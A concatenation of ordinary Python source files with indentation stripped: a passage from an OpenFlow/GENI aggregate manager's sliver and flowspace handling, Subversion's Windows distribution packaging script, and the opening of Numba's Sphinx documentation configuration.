urn = self.__generate_sliver_urn_from_slice_urn(urn)
slivers = self.__convert_to_resource(urn)
prov_status, alloc_status = self.__get_geni_status(urn)
# Special case for deleting allocated slivers
if alloc_status == self.GENI_ALLOCATED and action == "delete":
# res = Reservation.objects.filter(slice_urn=urn)[0]
reservations = Reservation.objects.filter(slice_urn=urn)
for res in reservations:
rfs = res.reservationflowspace_set.all()
rfs.delete()
res.delete()
efs = ExpiringFlowSpaces.objects.filter(slice_urn=urn)
efs.delete()
# Needed for coherent output
slivers.set_operational_status(self.GENI_NOT_READY)
slivers.set_allocation_status(self.GENI_UNALLOCATED)
return slivers
if not alloc_status == self.GENI_PROVISIONED:
raise Exception("Operational Actions can be only performed to provisioned slivers")
if action == "delete":
efs = ExpiringFlowSpaces.objects.filter(slice_urn=urn)
efs.delete()
self.__sliver_manager.delete_of_sliver(urn)
slivers.set_operational_status(self.GENI_NOT_READY)
slivers.set_allocation_status(self.GENI_UNALLOCATED)
elif action == "start" or action == "reboot":
if not prov_status in [self.GENI_READY, self.GENI_CONFIGURING]:
self.__sliver_manager.opt_in(urn)
prov_status, alloc_status = self.__get_geni_status(urn)
slivers.set_operational_status(prov_status)
slivers.set_allocation_status(alloc_status)
elif action == "stop":
self.__sliver_manager.opt_out(urn)
slivers.set_operational_status(self.GENI_NOT_READY)
slivers.set_allocation_status(self.GENI_PROVISIONED)
expiring_fs = ExpiringFlowSpaces.objects.filter(slice_urn=urn)[0]
if prov_status == self.GENI_READY:
expiring_fs.was_granted = True
expiring_fs.save()
return slivers
except Exception as e:
traceback.print_exc()
raise e
def __convert_to_resource(self, urn, expiration=None):
sliver_urn = self.__generate_sliver_urn_from_slice_urn(urn)
exps = Experiment.objects.filter(slice_urn=urn)
if expiration:
expiration = str(expiration)
if exps:
experiment = exps[0]
if not expiration:
try:
expiration = ExpiringFlowSpaces.objects.filter(slice_urn=experiment.slice_urn)[0].expiration
except:
raise Exception("Could not find appropriate FlowSpace expiration")
efs = experiment.experimentflowspace_set.all()
return self.__parse_to_fs_object(urn, experiment, efs, expiration)
elif Reservation.objects.filter(slice_urn=urn):
reservation = Reservation.objects.filter(slice_urn=sliver_urn)[0]
if not expiration:
expiration = reservation.expiration
efs = reservation.reservationflowspace_set.all()
return self.__parse_to_fs_object(sliver_urn, reservation, efs, expiration, slice_urn=urn)
return None
def __parse_to_fs_object(self,urn=None, experiment=None, exp_flowspace=None, expiration=None, slice_urn=None):
flowspace = FlowSpace()
flowspace.set_description(experiment.slice_desc)
flowspace.set_urn(urn)
flowspace.set_email(str(experiment.owner_email))
flowspace.set_slice_urn(urn) # slice_urn == urn (optin)
flowspace.set_state(self.GENI_NOT_READY)
provisioning_status, allocation_status = self.__get_geni_status(urn)
flowspace.set_allocation_status(allocation_status)
# flowspace.set_expiration(self.__get_slice_expiration(expiration))
flowspace.set_operational_status(provisioning_status)
flowspace.set_expiration(expiration)
controller = Controller()
controller.parse_url(experiment.controller_url)
flowspace.set_controller(controller)
return flowspace
def __get_geni_status(self, urn):
exps = Experiment.objects.filter(slice_urn=urn)
if exps:
exp_fss = exps[0].experimentflowspace_set.all()
opts = exps[0].useropts_set.all()
if opts:
opts_fs = opts[0].optsflowspace_set.all()
return self.GENI_READY, self.GENI_PROVISIONED
else:
return self.GENI_NOT_READY, self.GENI_PROVISIONED
res = Reservation.objects.filter(slice_urn = urn)
if res:
return self.GENI_NOT_READY, self.GENI_ALLOCATED
raise Exception("Slice Does Not Exist")
def __get_switches(self):
fv = FVServerProxy.objects.all()[0]
switches = fv.get_switches()
return self.__parse_to_switches(switches)
def __get_links(self):
fv = FVServerProxy.objects.all()[0]
links = fv.get_links()
return self.__parse_to_links(links)
def __parse_to_switches(self, switches):
dpids = list()
for switch in switches:
dpid = DPID()
dpid.set_datapath(switch[0])
dpid.set_ports(self.__parse_to_ports(switch[1]))
dpid.set_component_manager_id(self.__generate_component_manager_id(dpid))
dpid.set_component_id(self.__generate_dpid_component_id(dpid))
dpid.set_type("Device")
dpids.append(dpid)
return dpids
def __parse_to_ports(self, ports):
port_list = ports["portNames"].split(',')
dpid_ports = list()
for port in port_list:
dpid_port = Port()
match = re.match(r'[\s]*(.*)\((.*)\)', port)
dpid_port.set_name(match.group(1))
dpid_port.set_num(match.group(2))
dpid_ports.append(dpid_port)
return dpid_ports
def __parse_to_links(self, links):
dpid_links = list()
for link in links:
src_dpid = DPID()
src_port = Port()
src_port.set_num(link[1])
src_dpid.add_port(src_port)
src_dpid.set_datapath(link[0])
src_dpid.set_component_id(self.__generate_dpid_component_id(src_dpid))
src_dpid.set_component_manager_id(self.__generate_component_manager_id(src_dpid))
dst_dpid = DPID()
dst_port = Port()
dst_port.set_num(link[3])
dst_dpid.add_port(dst_port)
dst_dpid.set_datapath(link[2])
dst_dpid.set_component_id(self.__generate_dpid_component_id(dst_dpid))
dst_dpid.set_component_manager_id(self.__generate_component_manager_id(dst_dpid))
link = Link()
link.set_src_dpid(src_dpid)
link.set_dst_dpid(dst_dpid)
link.set_src_port(src_port)
link.set_dst_port(dst_port)
link.set_type("Link")
link.set_component_id(self.__generate_link_component_id(link))
dpid_links.append(link)
return dpid_links
#URN Stuff
def __generate_component_manager_id(self, server=None):
hrn = "openflow." + self.__config.CM_HRN
return hrn_to_urn(hrn, "authority+cm")
def __generate_component_manager_name(self, server):
hrn = "openflow." + self.__config.CM_HRN
return hrn_to_urn(hrn, "authority+cm")
def __generate_dpid_component_id(self, dpid):
hrn = "openflow." + self.__config.CM_HRN + "." + str(dpid.get_datapath())
return hrn_to_urn(hrn,"datapath")
def __generate_dpid_component_name(self, dpid):
hrn = "openflow." + self.__config.CM_HRN + "." + str(dpid.get_datapath())
return hrn_to_urn(hrn,"datapath")
def __generate_link_component_id(self, link):
# hrn = self.__config.HRN.replace(".", ":")
hrn = self.__config.CM_HRN.replace(".", ":")
return "urn:publicid:IDN+openflow:%s+link+%s_%s_%s_%s" % (hrn, str(link.get_src_dpid().get_datapath()), str(link.get_src_port().get_num()), str(link.get_dst_dpid().get_datapath()), str(link.get_dst_port().get_num()))
def __generate_sliver_urn(self, vm):
return hrn_to_urn(self.__config.CM_HRN + "." + str(vm.id), "sliver")
def __select_sliver_expiration(self, user_expiration, slice_expiration=None, **kwargs):
if not slice_expiration:
current_time = datetime.utcnow()
if "extension_timedelta" in kwargs:
extension_timedelta = kwargs["extension_timedelta"]
else:
extension_timedelta = {"days": 31} # Default set to one month
slice_expiration = current_time + timedelta(**extension_timedelta)
slice_expiration = slice_expiration.replace(tzinfo=dateutil.tz.tzutc()).strftime("%Y-%m-%d %H:%M:%S")
slice_expiration = slice_expiration.replace(" ", "T")+"Z"
# Retrieve expiration = minimum ( user expiration, slice expiration )
extended_expiration = min(user_expiration, slice_expiration)
return extended_expiration
def __get_slice_expiration(self, expiration=None):
max_exp = datetime.utcnow() + timedelta(days=31)
if expiration:
expiration = expiration.replace("T", " ")
expiration = expiration.replace("Z", "")
try:
expiration = datetime.strptime(str(expiration),"%Y-%m-%d %H:%M:%S.%f")
except:
expiration = datetime.strptime(str(expiration),"%Y-%m-%d %H:%M:%S")
selected = str(max(expiration, max_exp))
return selected.replace(" ", "T") + "Z"
return str(max_exp).replace(" ", "T") + "Z"
def __get_experiment_params(self, fs,slice_urn=None ,extra_params=dict()):
experiment_params = dict()
experiment_params['slice_desc'] = fs.get_description()
experiment_params['controller_url'] = fs.get_controller().get_url()
experiment_params['owner_email'] = fs.get_email()
experiment_params['project_desc'] = fs.get_description()
experiment_params['project_name'] = slice_urn
experiment_params['slice_name'] = slice_urn
experiment_params['slice_urn'] = self.__generate_sliver_urn_from_slice_urn(slice_urn)
experiment_params['slice_id'] = uuid.uuid4()
return experiment_params
def __generate_sliver_urn_from_slice_urn(self, slice_urn):
hrn, urn_type = urn_to_hrn(slice_urn)
leaf = hrn.split(".")[-1]
return hrn_to_urn(self.__config.CM_HRN + "." + str(leaf), "sliver")
def __urn_to_fs_params(self, urn):
hrn, urn_type = urn_to_hrn(urn)
if urn_type == "sliver":
return {"slice_urn":urn}
elif urn_type == "slice":
return {"project_name":urn}
def __translate_to_flow_space_model(self, match, dpid, port, model=None):
fs = OptinUtils.format_flowspaces(match, port.get_num())
return fs
def __get_create_slice_params(self, rfs):
slivers = dict()
for rf in rfs:
if rf.dpid in slivers.keys():
slivers[rf.dpid].append(self.__get_flow_space_info(rf))
else:
slivers[rf.dpid] = [self.__get_flow_space_info(rf)]
output = list()
for dpid in slivers.keys():
output.append({"datapath_id":dpid, "flowspace": slivers[dpid]})
return output
def __get_flow_space_info(self, rf):
fs = {'dl_dst_end': rf.mac_dst_e ,
'dl_dst_start': rf.mac_dst_s,
'dl_src_end': rf.mac_src_e,
'dl_src_start': rf.mac_src_s,
'dl_type_end': rf.eth_type_e,
'dl_type_start': rf.eth_type_s,
'id': rf.id,
'nw_dst_end':rf.ip_dst_e ,
'nw_dst_start': rf.ip_dst_s,
'nw_proto_end': rf.ip_proto_e,
'nw_proto_start': rf.ip_proto_s,
'nw_src_end': rf.ip_src_e,
'nw_src_start': rf.ip_src_s,
'port_num_end': rf.port_number_e,
'port_num_start': rf.port_number_s,
'tp_dst_end': rf.tp_dst_e,
'tp_dst_start': rf.tp_dst_s,
'tp_src_end': rf.tp_src_e,
'tp_src_start': rf.tp_src_s,
'vlan_id_end': rf.vlan_id_e,
'vlan_id_start': rf.vlan_id_s}
return fs
def __format_params_to_reservation_model(self, req_params):
fs = {"mac_src_s": req_params['dl_src_start'],
"mac_src_e": req_params['dl_src_end'],
"mac_dst_s": req_params['dl_dst_start'],
"mac_dst_e": req_params['dl_dst_end'],
"eth_type_s": req_params['dl_type_start'],
"eth_type_e": req_params['dl_type_end'],
"vlan_id_s": req_params['vlan_id_start'],
"vlan_id_e": req_params['vlan_id_end'],
"ip_src_s": req_params['nw_src_start'],
"ip_src_e": req_params['nw_src_end'],
"ip_dst_s": req_params['nw_dst_start'],
"ip_dst_e": req_params['nw_dst_end'],
"ip_proto_s": req_params['nw_proto_start'],
"ip_proto_e": req_params['nw_proto_end'],
"tp_src_s": req_params['tp_src_start'],
"tp_src_e": req_params['tp_src_end'],
"tp_dst_s": req_params['tp_dst_start'],
"tp_dst_e": req_params['tp_dst_end'],
"port_number_e": req_params['port_num_end'],
"port_number_s": req_params["port_num_start"],
"id": req_params["id"],}
return fs
def get_config(self):
return self.__config
def set_config(self, value):
self.__config = value
| |
#
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#
import os
import sys
import shutil
import getopt
try:
my_getopt = getopt.gnu_getopt
except AttributeError:
my_getopt = getopt.getopt
import glob
import traceback
try:
# Python >=3.0
import configparser
except ImportError:
# Python <3.0
import ConfigParser as configparser
# The script directory and the source base directory
_scriptdir = os.path.dirname(sys.argv[0])
_srcdir = os.path.join(_scriptdir, '..', '..')
_distname = None
_distdir = None
_readme = None
_stdout = sys.stdout
_stderr = sys.stderr
_logname = os.path.abspath(os.path.join(_scriptdir, 'make_dist.log'))
_logfile = open(_logname, 'w')
sys.stdout = _logfile
sys.stderr = _logfile
def _exit(code=0):
if code:
_stderr.write('make_dist: Exit %d\n' % (code,))
sys.exit(code)
# Action classes
class MissingMethodImpl:
pass
class Action:
def run(self, dir, cfg):
raise MissingMethodImpl()
def _expand(self, cfg, value):
cfg.set('__expand__', '__expand__', value)
return cfg.get('__expand__', '__expand__')
def _safe_expand(self, cfg, value):
try:
return self._expand(cfg, value)
except:
return None
def _copy_file(self, source, target):
print('copy: %s' % source)
print(' to: %s' % target)
shutil.copyfile(source, target)
class File(Action):
def __init__(self, path, name=None):
self.path = path
self.name = name
def run(self, dir, cfg):
path = self._expand(cfg, self.path)
if self.name is None:
name = os.path.basename(path)
else:
name = self.name
self._copy_file(path, os.path.join(dir, name))
class OptFile(Action):
def __init__(self, path, name=None):
self.path = path
self.name = name
def run(self, dir, cfg):
path = self._safe_expand(cfg, self.path)
if path is None or not os.path.isfile(path):
print('make_dist: File not found: %s' % self.path)
return
if self.name is None:
name = os.path.basename(path)
else:
name = self.name
self._copy_file(path, os.path.join(dir, name))
class FileGlob(Action):
def __init__(self, pattern):
self.pattern = pattern
def run(self, dir, cfg):
pattern = self._expand(cfg, self.pattern)
for source in glob.glob(pattern):
self._copy_file(source, os.path.join(dir, os.path.basename(source)))
class InstallDocs(Action):
def __init__(self, config, path):
self.config = config
self.path = path
def run(self, dir, cfg):
config = self._expand(cfg, self.config)
pattern = os.path.join(self._expand(cfg, self.path), '*.*')
print('make_dist: Generating documentation')
old_cwd = os.getcwd()
try:
os.chdir(_srcdir)
_system('"%s" "%s"' % (cfg.get('tools', 'doxygen'), config))
os.chdir(old_cwd)
FileGlob(pattern).run(dir, cfg)
except:
os.chdir(old_cwd)
raise
else:
os.chdir(old_cwd)
class InstallIconv(Action):
def __init__(self, source, build_mode):
self.source = source
self.build_mode = build_mode
def run(self, dir, cfg):
source = os.path.abspath(self._expand(cfg, self.source))
build_mode = self._expand(cfg, self.build_mode)
print('make_dist: Installing apr-iconv modules')
install = ('"%s" -nologo -f Makefile.win install'
+ ' INSTALL_DIR="%s"'
+ ' BUILD_MODE=%s BIND_MODE=%s') \
% (cfg.get('tools', 'nmake'),
os.path.abspath(dir),
build_mode,
'shared')
old_cwd = os.getcwd()
try:
os.chdir(os.path.join(source, 'ccs'))
_system(install)
os.chdir(os.path.join(source, 'ces'))
_system(install)
except:
os.chdir(old_cwd)
raise
else:
os.chdir(old_cwd)
class InstallJar(Action):
def __init__(self, jar, source):
self.jar = jar
self.source = source
def run(self, dir, cfg):
source = os.path.abspath(self._expand(cfg, self.source))
jarfile = os.path.abspath(os.path.join(dir, self.jar))
print('make_dist: Creating jar %s' % self.jar)
_system('"%s" cvf "%s" -C "%s" .'
% (cfg.get('tools', 'jar'), jarfile, source))
class InstallMoFiles(Action):
def __init__(self, source):
self.source = source
def run(self, dir, cfg):
pattern = os.path.join(self._expand(cfg, self.source), '*.mo')
for mofile in glob.glob(pattern):
localedir = os.path.join(dir, os.path.basename(mofile)[:-3],
'LC_MESSAGES')
os.makedirs(localedir)
self._copy_file(mofile, os.path.join(localedir, 'subversion.mo'))
# This is the distribution tree
_disttree = {'': OptFile('%(readme)s', 'README.txt'),
'bin': (File('%(blddir)s/svn/svn.exe'),
File('%(blddir)s/svn/svn.pdb'),
File('%(blddir)s/svnsync/svnsync.pdb'),
File('%(blddir)s/svnsync/svnsync.exe'),
File('%(blddir)s/svnadmin/svnadmin.exe'),
File('%(blddir)s/svnadmin/svnadmin.pdb'),
File('%(blddir)s/svnlook/svnlook.exe'),
File('%(blddir)s/svnlook/svnlook.pdb'),
File('%(blddir)s/svndumpfilter/svndumpfilter.exe'),
File('%(blddir)s/svndumpfilter/svndumpfilter.pdb'),
File('%(blddir)s/svnserve/svnserve.exe'),
File('%(blddir)s/svnserve/svnserve.pdb'),
File('%(blddir)s/svnversion/svnversion.exe'),
File('%(blddir)s/svnversion/svnversion.pdb'),
File('%(blddir)s/svnrdump/svnrdump.exe'),
File('%(blddir)s/svnrdump/svnrdump.pdb'),
File('%(blddir)s/svnmucc/svnmucc.exe'),
File('%(blddir)s/svnmucc/svnmucc.pdb'),
File('%(blddir)s/../contrib/client-side/svn-push/svn-push.exe'),
File('%(blddir)s/../contrib/client-side/svn-push/svn-push.pdb'),
File('%(blddir)s/../tools/server-side/svnauthz-validate.exe'),
File('%(blddir)s/../tools/server-side/svnauthz-validate.pdb'),
File('%(blddir)s/../tools/server-side/svn-populate-node-origins-index.exe'),
File('%(blddir)s/../tools/server-side/svn-populate-node-origins-index.pdb'),
File('%(blddir)s/../tools/dev/svnraisetreeconflict/svnraisetreeconflict.exe'),
File('%(blddir)s/../tools/dev/svnraisetreeconflict/svnraisetreeconflict.pdb'),
File('%(blddir)s/mod_dav_svn/mod_dav_svn.so'),
File('%(blddir)s/mod_dav_svn/mod_dav_svn.pdb'),
File('%(blddir)s/mod_authz_svn/mod_authz_svn.so'),
File('%(blddir)s/mod_authz_svn/mod_authz_svn.pdb'),
FileGlob('%(blddir)s/libsvn_*/libsvn_*.dll'),
FileGlob('%(blddir)s/libsvn_*/libsvn_*.pdb'),
File('%(@apr)s/%(aprrel)s/libapr-1.dll'),
File('%(@apr)s/%(aprrel)s/libapr-1.pdb'),
File('%(@apr-iconv)s/%(aprrel)s/libapriconv-1.dll'),
File('%(@apr-iconv)s/%(aprrel)s/libapriconv-1.pdb'),
File('%(@apr-util)s/%(aprrel)s/libaprutil-1.dll'),
File('%(@apr-util)s/%(aprrel)s/libaprutil-1.pdb'),
File('%(@berkeley-db)s/bin/libdb%(bdbver)s.dll'),
File('%(@sasl)s/lib/libsasl.dll'),
File('%(@sasl)s/lib/libsasl.pdb'),
File('%(@sasl)s/utils/pluginviewer.exe'),
File('%(@sasl)s/utils/pluginviewer.pdb'),
File('%(@sasl)s/utils/sasldblistusers2.exe'),
File('%(@sasl)s/utils/sasldblistusers2.pdb'),
File('%(@sasl)s/utils/saslpasswd2.exe'),
File('%(@sasl)s/utils/saslpasswd2.pdb'),
OptFile('%(@berkeley-db)s/bin/libdb%(bdbver)s.pdb'),
OptFile('%(@sqlite)s/bin/sqlite3.dll'),
OptFile('%(@openssl)s/out32dll/libeay32.dll'),
OptFile('%(@openssl)s/out32dll/libeay32.pdb'),
OptFile('%(@openssl)s/out32dll/ssleay32.dll'),
OptFile('%(@openssl)s/out32dll/ssleay32.pdb'),
OptFile('%(@openssl)s/out32dll/openssl.exe'),
OptFile('%(@libintl)s/bin/intl3_svn.dll'),
OptFile('%(@libintl)s/bin/intl3_svn.pdb'),
FileGlob('%(@sasl)s/plugins/sasl*.dll'),
FileGlob('%(@sasl)s/plugins/sasl*.pdb'),
),
'doc': InstallDocs('%(srcdir)s/doc/doxygen.conf',
'%(srcdir)s/doc/doxygen/html'),
'iconv': InstallIconv('%(@apr-iconv)s', '%(aprrel)s'),
'include': FileGlob('%(svndir)s/include/*.h'),
'include/apr': FileGlob('%(@apr)s/include/*.h'),
'include/apr-iconv': FileGlob('%(@apr-iconv)s/include/*.h'),
'include/apr-util': FileGlob('%(@apr-util)s/include/*.h'),
'lib': (FileGlob('%(blddir)s/libsvn_*/*.lib'),
FileGlob('%(blddir)s/libsvn_*/*.pdb')),
'lib/apr': File('%(@apr)s/%(aprrel)s/libapr-1.lib'),
'lib/apr-iconv': File('%(@apr-iconv)s/%(aprrel)s/libapriconv-1.lib'),
'lib/apr-util': (File('%(@apr-util)s/%(aprrel)s/libaprutil-1.lib'),
File('%(@apr-util)s/%(aprxml)s/xml.lib'),
File('%(@apr-util)s/%(aprxml)s/xml.pdb'),
),
'lib/serf': (File('%(@serf)s/Release/serf.lib'),
),
'lib/sasl': (File('%(@sasl)s/lib/libsasl.lib'),
File('%(@sasl)s/lib/libsasl.pdb'),
),
'licenses': None,
'licenses/bdb': File('%(@berkeley-db)s/LICENSE'),
'licenses/serf': File('%(@serf)s/LICENSE'),
'licenses/zlib': File('%(@zlib)s/README'),
'licenses/apr-util': (File('%(@apr-util)s/LICENSE'),
File('%(@apr-util)s/NOTICE'),
),
'licenses/apr-iconv': (File('%(@apr-iconv)s/LICENSE'),
File('%(@apr-iconv)s/NOTICE'),
),
'licenses/apr': (File('%(@apr)s/LICENSE'),
File('%(@apr)s/NOTICE'),
),
'licenses/openssl': File('%(@openssl)s/LICENSE'),
'licenses/svn' : File('%(srcdir)s/COPYING'),
'licenses/cyrus-sasl' : File('%(@sasl)s/COPYING'),
'perl': None,
'perl/site': None,
'perl/site/lib': None,
'perl/site/lib/SVN': FileGlob('%(bindsrc)s/swig/perl/native/*.pm'),
'perl/site/lib/auto': None,
'perl/site/lib/auto/SVN': None,
# Perl module DLLs defined below
'python': None,
'python/libsvn': (FileGlob('%(binddir)s/swig/python/libsvn_swig_py/*.dll'),
FileGlob('%(binddir)s/swig/python/libsvn_swig_py/*.pdb'),
FileGlob('%(bindsrc)s/swig/python/*.py'),
FileGlob('%(binddir)s/swig/python/*.dll'),
FileGlob('%(binddir)s/swig/python/*.pdb'),
),
'python/svn': FileGlob('%(bindsrc)s/swig/python/svn/*.py'),
'javahl': (FileGlob('%(binddir)s/javahl/native/libsvn*.dll'),
FileGlob('%(binddir)s/javahl/native/libsvn*.pdb'),
InstallJar('svnjavahl.jar',
'%(bindsrc)s/javahl/classes'),
),
'ruby': None,
'ruby/lib': None,
'ruby/lib/svn': FileGlob('%(bindsrc)s/swig/ruby/svn/*.rb'),
'ruby/ext': None,
'ruby/ext/svn': None,
'ruby/ext/svn/ext':
(FileGlob('%(binddir)s/swig/ruby/*.dll'),
FileGlob('%(binddir)s/swig/ruby/*.pdb'),
FileGlob('%(binddir)s/swig/ruby/libsvn_swig_ruby/*.dll'),
FileGlob('%(binddir)s/swig/ruby/libsvn_swig_ruby/*.pdb'),
FileGlob('%(blddir)s/libsvn_*/*.dll'),
File('%(@berkeley-db)s/bin/libdb%(bdbver)s.dll'),
OptFile('%(@sqlite)s/bin/sqlite3.dll'),
OptFile('%(@libintl)s/bin/intl3_svn.dll'),
File('%(@apr)s/%(aprrel)s/libapr-1.dll'),
File('%(@apr-iconv)s/%(aprrel)s/libapriconv-1.dll'),
File('%(@apr-util)s/%(aprrel)s/libaprutil-1.dll')),
'share': None,
'share/locale': InstallMoFiles('%(srcdir)s/%(svnrel)s/mo'),
}
# Define Perl module DLLs
for module in ('Client', 'Core', 'Delta', 'Fs', 'Ra', 'Repos', 'Wc'):
_disttree['perl/site/lib/auto/SVN/_' + module] = (
File('%(binddir)s/swig/perl/native/_' + module + '.dll'),
File('%(binddir)s/swig/perl/native/_' + module + '.pdb'))
def _system(command):
def reopen_log():
global _logfile
_logfile = open(_logname, 'a')
sys.stdout = _logfile
sys.stderr = _logfile
try:
_logfile.close()
sys.stdout = _stdout
sys.stderr = _stderr
os.system('"%s >>%s 2>&1"' % (command, _logname))
except:
reopen_log()
raise
else:
reopen_log()
def _read_config():
# Read make_dist.conf first. Fill in the default package locations.
path_defaults = {'@berkeley-db':
os.path.abspath(os.path.join(_srcdir, 'db4-win32')),
'@apr':
os.path.abspath(os.path.join(_srcdir, 'apr')),
'@apr-iconv':
os.path.abspath(os.path.join(_srcdir, 'apr-iconv')),
'@apr-util':
os.path.abspath(os.path.join(_srcdir, 'apr-util')),
}
cfg = configparser.ConfigParser(path_defaults)
try:
cfg.readfp(open(os.path.join(_scriptdir, 'make_dist.conf'), 'r'))
except:
_stderr.write('Unable to open and read make_dist.conf\n')
_exit(1)
# Read the options config generated by gen-make.py
optcfg = configparser.ConfigParser()
optcfg.readfp(open(os.path.join(_srcdir, 'gen-make.opts'), 'r'))
# Move the runtime options into the DEFAULT section
for opt in optcfg.options('options'):
if not opt[:7] == '--with-':
continue
optdir = os.path.abspath(os.path.join(_srcdir, optcfg.get('options', opt)))
if not os.path.isdir(optdir):
print('make_dist: %s = %s' % (opt, optdir))
print('make_dist: Target is not a directory')
_exit(1)
cfg.set('DEFAULT', '@' + opt[7:], optdir)
# Also add the global parameters to the defaults
cfg.set('DEFAULT', 'srcdir', os.path.abspath(_srcdir))
cfg.set('DEFAULT', 'blddir', os.path.join(_srcdir,
'%(svnrel)s', 'subversion'))
cfg.set('DEFAULT', 'svndir', os.path.join(_srcdir, 'subversion'))
cfg.set('DEFAULT', 'binddir', '%(blddir)s/bindings')
cfg.set('DEFAULT', 'bindsrc', '%(svndir)s/bindings')
if _distname is not None:
cfg.set('DEFAULT', 'distname', os.path.abspath(_distname))
if _distdir is not None:
cfg.set('DEFAULT', 'distdir', os.path.abspath(_distdir))
if _readme is not None:
cfg.set('DEFAULT', 'readme', os.path.abspath(_readme))
return cfg
def _make_zip(suffix, pathlist, extras):
zipname = '%s%s.zip' % (_distname, suffix)
zipcmd = '"%s" -9 -r "%s"' % (cfg.get('tools', 'zip'), zipname)
for path in pathlist:
zipcmd = zipcmd + ' "' + _distname + path + '"'
if extras:
zipcmd = zipcmd + ' ' + extras
old_cwd = os.getcwd()
try:
os.chdir(_distdir)
if os.path.exists(zipname):
os.remove(zipname)
print('make_dist: Creating %s' % zipname)
_stdout.write('make_dist: Creating %s\n' % zipname)
_system(zipcmd)
except:
os.chdir(old_cwd)
raise
else:
os.chdir(old_cwd)
def _make_dist(cfg):
try:
cfg.add_section('__expand__')
distdir = os.path.abspath(os.path.join(_distdir, _distname))
if os.path.isdir(distdir):
shutil.rmtree(distdir)
os.makedirs(distdir)
dirlist = sorted(_disttree.keys())
for reldir in dirlist:
dir = os.path.join(distdir, reldir)
if not os.path.exists(dir):
print('make_dist: Creating directory %s' % reldir)
_stdout.write('make_dist: Creating directory %s\n' % reldir)
os.makedirs(dir)
action = _disttree[reldir]
if action is None:
continue
if isinstance(action, tuple):
for subaction in action:
subaction.run(dir, cfg)
else:
action.run(dir, cfg)
xpdb = '-x "*.pdb"'
_make_zip('', ('/README.txt', '/bin', '/httpd',
'/iconv', '/licenses', '/share/locale'), xpdb)
_make_zip('_dev', ('/README.txt', '/doc', '/include', '/lib'), xpdb)
_make_zip('_javahl', ('/README.txt', '/javahl'), xpdb)
_make_zip('_pdb', ('',), '-i "*.pdb"')
_make_zip('_pl', ('/README.txt', '/perl'), xpdb)
_make_zip('_py', ('/README.txt', '/python'), xpdb)
_make_zip('_rb', ('/README.txt', '/ruby', '/licenses', '/share/locale'),
xpdb)
_stdout.write('make_dist: Creating ruby gem\n')
gem_script = os.path.join(_scriptdir, 'make_gem.rb')
rubycmd = '"%s" "%s" --output-dir="%s"' % (cfg.get('tools', 'ruby'),
gem_script, _distdir)
rubycmd += ' "' + distdir + '\\README.txt"'
rubycmd += ' "' + distdir + '\\ruby"'
rubycmd += ' "' + distdir + '\\licenses"'
rubycmd += ' "' + distdir + '\\share"'
_system(rubycmd)
except:
traceback.print_exc(None, _stderr)
_exit(1)
if __name__ == '__main__':
opts, args = my_getopt(sys.argv[1:], '', ['readme='])
if len(args) != 2 or len(opts) > 1:
_stderr.write('Usage: make_dist.py [--readme=<file>] <distname> <distdir>\n')
_exit(2)
_distname, _distdir = args
if len(opts) != 0:
_readme = opts[0][1]
cfg = _read_config()
_make_dist(cfg)
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Numba documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 30 11:55:40 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
try:
# Numba is installed
import numba
except ImportError:
# Numba is run from its source checkout
sys.path.insert(0, os.path.abspath('../..'))
import numba
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if on_rtd:
# The following is needed to fix RTD issue with numpydoc
# https://github.com/readthedocs/sphinx_rtd_theme/issues/766
from conda.cli.python_api import run_command as conda_cmd
conda_cmd("install", "-c", "conda-forge", "sphinx_rtd_theme>=0.5.1", "-y")
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
#'sphinx.ext.mathjax',
'sphinx.ext.autodoc',
#'sphinx.ext.graphviz',
'numpydoc',
]
# Adding the github files extension
sys.path.append(os.path.abspath(os.path.join(".", "_ext")))
extensions.append('ghfiles')
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['../_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Numba'
copyright = u'2012-2020, Anaconda, Inc. and others'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = '.'.join(numba.__version__.split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = numba.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# All sphinx_rtd_theme options. Default values commented out; uncomment to
# change.
html_theme_options = {
'canonical_url': 'https://numba.readthedocs.io/en/stable/',
